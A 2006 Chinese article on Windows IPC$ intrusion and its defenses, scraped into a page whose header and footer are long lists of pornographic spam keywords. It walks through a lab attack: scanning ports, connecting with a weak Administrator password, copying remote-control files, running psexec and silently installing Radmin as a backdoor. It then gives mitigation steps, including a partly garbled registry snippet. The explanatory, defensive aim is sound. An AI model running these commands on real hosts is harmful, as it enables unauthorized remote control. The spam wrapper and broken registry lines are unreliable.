国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

IPC安全防范研究
2006-01-10   網絡

  網絡安全遵循木桶原理,即整個網絡環境中網絡安全的水平是由該網絡中防護水平最弱的計算機所決定的。在單位內部網絡中,大部分安全都是建立在基于“信任”的基礎上,而沒有采取安全防范方法,認為沒有誰會進行破壞,沒有誰會獲取情報信息。在這種環境下,遠程網絡連接安全是一個不容忽視的安全問題,值得進行探討。

什么是IPC
  IPC是Internet Process Connection的縮寫,也就是遠程網絡連接。它是Windows NT及Windows 2000特有的一項功能。IPC是Windows的一個重要模塊,網上鄰居以及網絡共享都是通過IPC來實現的。黑客或者入侵者利用IPC$共享來實現入侵。網絡上也常常將利用IPC$來實現入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權限IPC$連接,IPC$空連接沒有任何權限,但是可以獲取該主機的netbios信息;而帶有權限的IPC$連接則可以執行命令和對文件進行復制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。

IPC$入侵原理
  IPC$入侵的最主要原理就是獲取被入侵主機的密碼,利用有權限的IPC$連接到主機并復制文件到主機上,然后運行木馬程序或者執行命令來實現完全控制。如果系統默認共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網絡遠程連接(IPC)安全是網絡安全中一個不容忽視的問題。

常見IPC漏洞攻擊方法
  1.利用IPC漏洞應具備的條件

  (1)知道賬號和口令,且賬號的權限必須是System以上,本系統中使用是Administator權限。在絕大多數環境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權限,如圖1所示。

  (2)系統沒有禁用遠程IPC$連接
  (3)能夠掃描到對方計算機上所開放的445、135或者139端口
  2.試驗
  (1)試驗環境
  ◆ Windows 2000 Professional +SP4虛擬機
  ◆ 系統未安裝殺毒軟件和防火墻
  ◆ 目標機IP地址為192.168.1.4
  ◆ 遠程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠程控制軟件也可以使用。
  (2)探測目標機開放端口
  ◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
  ◆ 使用NT自動攻擊工具
  (3)獲取目標機管理員賬號和密碼
  (4)執行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.*
\192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec
\192.168.1.4 cmd
  通過命令行方式安裝R_Server。直接在psexec中執行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
  執行結果表示Radmin遠程控制軟件服務端安裝成功,然后通過radmin客戶端可以直接對該計算機實施遠程控制。

安全防范方法
  1.管理層次防范方法
  在網絡管理中常流行一句話“三分技術,七分管理”。其實在網絡安全中也是“三分技術,七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
  (1)安全審計
  密碼的安全是整個網絡安全中的一個重要因素,因此應從審計的角度加強管理,可以對系統是否安裝殺毒軟件、防火墻軟件、安裝系統補丁、系統設置密碼等方面進行安全審計,并配置一個安全管理人員。
  (2)安全知識培訓
  網絡安全也是一門技術,它由很多知識構成。因此了解和實施需要一個過程,這個過程就是培訓和教育。通過培訓來提高安全意識和安全技能,通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任,增強安全感和責任感。
  2.技術層次防范方法
  (1)查看網絡連接情況
  使用“netstat -an”查看本機與網絡的連接情況。該命令可以查看目前所建立的連接,系統所開放的服務端口。
  (2)查看IPC$連接情況
  使用“net use”命令查看網絡共享連接情況,如果顯示結果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細信息。
  (3)安裝防火墻軟件
  (4)關閉掉缺省共享
  關閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機后刪除共享。
  開機后刪除共享,可以將如下代碼復制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統的啟動中,這樣系統啟動后就會自動刪除默認共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
  徹底刪除共享,可以直接將以下代碼復制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
  (5)禁止Schedule服務
  直接在“開始”-“運行”中輸入“services.msc”,在服務控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進行網絡遠程連接的安全防范是非常必須的。

熱詞搜索:

上一篇:L-Blog的三個漏洞
下一篇:Squid安全策略

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
成人av中文字幕| 国产精品你懂的| 国产精品传媒视频| 99视频在线精品| 日韩一区欧美小说| 欧美日韩综合色| 麻豆91在线播放| 国产亚洲一区二区三区四区 | 国产在线精品免费av| 国产女同互慰高潮91漫画| av中文一区二区三区| 午夜伊人狠狠久久| 久久久久免费观看| 色综合天天综合网天天狠天天| 三级在线观看一区二区| 中文字幕免费一区| 337p亚洲精品色噜噜狠狠| 国产成人精品亚洲日本在线桃色 | 亚洲成人一区二区在线观看| 精品嫩草影院久久| 色先锋资源久久综合| 激情综合一区二区三区| 伊人性伊人情综合网| 久久精子c满五个校花| 欧美日高清视频| 91网站在线播放| 国产成人综合视频| 日本不卡视频在线观看| 亚洲色图.com| 国产精品欧美一区二区三区| 日韩一区二区三区精品视频| 97久久超碰精品国产| 国产成人啪午夜精品网站男同| 蜜臀va亚洲va欧美va天堂| 亚洲成年人影院| 亚洲激情综合网| 亚洲人成网站色在线观看| 欧美激情中文字幕一区二区| 337p粉嫩大胆色噜噜噜噜亚洲| 欧美日韩国产123区| 在线看国产一区二区| 粉嫩aⅴ一区二区三区四区 | 99久久久久久| 国产精品夜夜嗨| 日韩电影免费一区| 亚洲女同女同女同女同女同69| 国产偷国产偷精品高清尤物| 日韩欧美的一区二区| 欧美日韩国产综合久久 | 欧美亚洲国产怡红院影院| 成人激情图片网| 国产美女在线精品| 国产精品1024久久| 另类综合日韩欧美亚洲| 日韩专区中文字幕一区二区| 亚洲精品伦理在线| 日韩伦理电影网| 亚洲欧美日韩电影| 久久久久久夜精品精品免费| 欧美本精品男人aⅴ天堂| 久久噜噜亚洲综合| 日韩美一区二区三区| 日韩免费性生活视频播放| 91精品国产免费| 91精品国产一区二区| 欧美区一区二区三区| 欧美日韩国产色站一区二区三区| 欧美在线色视频| 欧美综合亚洲图片综合区| 欧美自拍丝袜亚洲| 欧美日产在线观看| 欧美男人的天堂一二区| 久久综合999| 欧美激情一区二区在线| 国产精品久久久久久户外露出| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆 | 国产精品欧美精品| 中文一区二区在线观看| 中文字幕一区二区三区四区不卡| 国产精品免费久久| 亚洲成av人片在线观看无码| 琪琪久久久久日韩精品| 国产老女人精品毛片久久| 成人视屏免费看| 色成人在线视频| 欧洲一区在线电影| 日韩视频在线观看一区二区| 国产精品天美传媒沈樵| 亚洲女人的天堂| 日韩中文字幕不卡| 国产91在线观看| 色综合久久六月婷婷中文字幕| 日韩欧美中文一区二区| 国产欧美日韩在线观看| 一区二区三区四区在线| 精品亚洲成a人| 91色乱码一区二区三区| 精品国产乱码久久久久久牛牛| 欧美国产日本视频| 秋霞午夜鲁丝一区二区老狼| 成人a级免费电影| 日韩欧美色综合网站| 国产精品久久久久久久久免费丝袜| 亚洲综合在线电影| 精品在线免费观看| 欧美在线不卡一区| 亚洲国产成人自拍| 久久精品国产免费| 色综合久久中文综合久久牛| 日本一区二区免费在线| 午夜视黄欧洲亚洲| 色欧美片视频在线观看在线视频| 日韩免费高清电影| 亚洲影院久久精品| 91麻豆蜜桃一区二区三区| 久久久国产一区二区三区四区小说 | 日韩一区二区三区视频| 亚洲天堂2016| 成人av在线网| 国产亚洲一区二区在线观看| 麻豆国产一区二区| 欧美精品精品一区| 肉色丝袜一区二区| 99精品在线免费| 国产日本欧美一区二区| 国产福利视频一区二区三区| 日韩欧美国产三级| 久久国产欧美日韩精品| 欧美电影免费观看高清完整版| 日本三级韩国三级欧美三级| 欧美日韩一卡二卡| 青青草97国产精品免费观看无弹窗版| 欧美日韩精品电影| 蜜臀av性久久久久蜜臀aⅴ| 91精品国产综合久久精品图片 | 日韩一区二区免费电影| 青青草成人在线观看| 精品国产凹凸成av人导航| 激情五月激情综合网| 精品国产3级a| 韩国在线一区二区| 中文字幕中文乱码欧美一区二区| 99久久伊人久久99| 亚洲国产裸拍裸体视频在线观看乱了 | 最新日韩在线视频| 欧美日韩亚洲另类| 久久99九九99精品| 国产日韩在线不卡| 一本色道久久综合亚洲91| 亚洲国产精品视频| 精品久久久久99| 99精品久久只有精品| 亚洲高清免费观看| 久久久美女艺术照精彩视频福利播放| 国产 日韩 欧美大片| 亚洲精品va在线观看| 欧美一级黄色大片| 国产iv一区二区三区| 一区二区三区毛片| 日韩一二三四区| 99在线视频精品| 日韩黄色在线观看| 国产精品色婷婷| 欧美精品久久久久久久多人混战 | 久久日韩精品一区二区五区| 91在线播放网址| 久久成人羞羞网站| 亚洲乱码精品一二三四区日韩在线| 欧美人成免费网站| 成人丝袜高跟foot| 青娱乐精品视频| 亚洲精品中文在线观看| 久久久久国产精品麻豆| 欧美日韩不卡视频| 99久久婷婷国产综合精品电影 | 国产精品三级电影| 日韩欧美成人一区| 欧洲精品在线观看| 国产高清在线观看免费不卡| 亚洲一区av在线| 综合久久一区二区三区| 国产午夜亚洲精品羞羞网站| 欧美一区二区在线不卡| 在线视频国内自拍亚洲视频| 国产99精品在线观看| 久草中文综合在线| 视频一区欧美日韩| 亚洲综合色在线| 亚洲美女屁股眼交| 中文字幕亚洲综合久久菠萝蜜| 精品国内二区三区| 欧美肥妇毛茸茸| 欧美精品 国产精品| 欧美丝袜自拍制服另类| 欧洲另类一二三四区| 91性感美女视频| 97久久超碰精品国产| av一区二区三区四区| 成人91在线观看| 成av人片一区二区|